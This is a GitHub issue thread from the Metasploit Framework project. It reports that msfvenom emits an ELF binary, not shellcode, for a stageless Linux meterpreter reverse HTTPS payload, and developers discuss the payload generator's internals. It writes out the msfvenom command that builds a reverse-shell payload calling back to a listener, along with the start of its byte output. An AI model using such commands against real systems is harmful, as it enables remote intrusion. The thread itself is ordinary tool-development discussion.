### ISSUE TITLE
ELF Binary for Linux payloads instead of ShellCode

### ISSUE THREAD

**Issue by mubix** [rapid7/metasploit-framework#10893]
## Steps to reproduce

How'd you do it?

```
# ./msfvenom -a x86 --platform linux -p linux/x86/meterpreter_reverse_https LHOST=192.168.1.100 LPORT=443 -f c | head -n 50
No encoder or badchars specified, outputting raw payload
Payload size: 961872 bytes
Final size of c file: 4039887 bytes
unsigned char buf[] =
"\x7f\x45\x4c\x46\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x03\x00\x03\x00\x01\x00\x00\x00\xb2\x4a\x00\x00\x34\x00"
"\x00\x00\xa0\xa8\x0e\x00\x00\x00\x00\x00\x34\x00\x20\x00\x05"
"\x00\x28\x00\x1e\x00\x1b\x00\x01\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x28\x20\x0c\x00\x28\x20\x0c"
```

This section should also tell us any relevant information about the
environment; for example, if an exploit that used to work is failing,
tell us the victim operating system and service versions.

## Expected behavior

What should happen? SHELLCODE

## Current behavior

What happens instead? ELF

### Metasploit version

af61e075363b9165f81c6d92921d4d87375114f3 Weekly dependency update

### I installed Metasploit with:
- [X] Source install (please specify ruby version)
- Ruby version - `ruby 2.5.1p57 (2018-03-29 revision 63029) [x86_64-linux]`

### OS

What OS are you running Metasploit on?

Debian 9

**Comment by mubix** [comment]
As talked about on slack, the short term fix is to warn users that the output isn't shellcode, but an ELF binary and should be treated as such instead of as shellcode to be used

**Comment by busterb** [comment]
Stageless mettle falls through a special case in the payload generator currently, since we actually just package the elf file generated by the compiler during the build process, as opposed to inserting the entirety of the stageless payload into a template binary.

This made it easy to support the number of architectures it supports without having to write an ELF injector for all of them right away, but does mean that it's kind of cheating and not actually delivering the payload as real shellcode. I think it could especially for the msfvenom case at least, since we do have the .bin images.

**Comment by mubix** [comment]
@busterb that' would be awesome. Currently trying to generate Linux shellcode for a project and having a ton of issues trying to scrape it out of the code, so any hints on how to do that in the mean time would be greatly appreciated.

**Comment by wvu-r7** [comment]
@mubix: Can you get by with stager shellcode? Or does it have to be stageless?
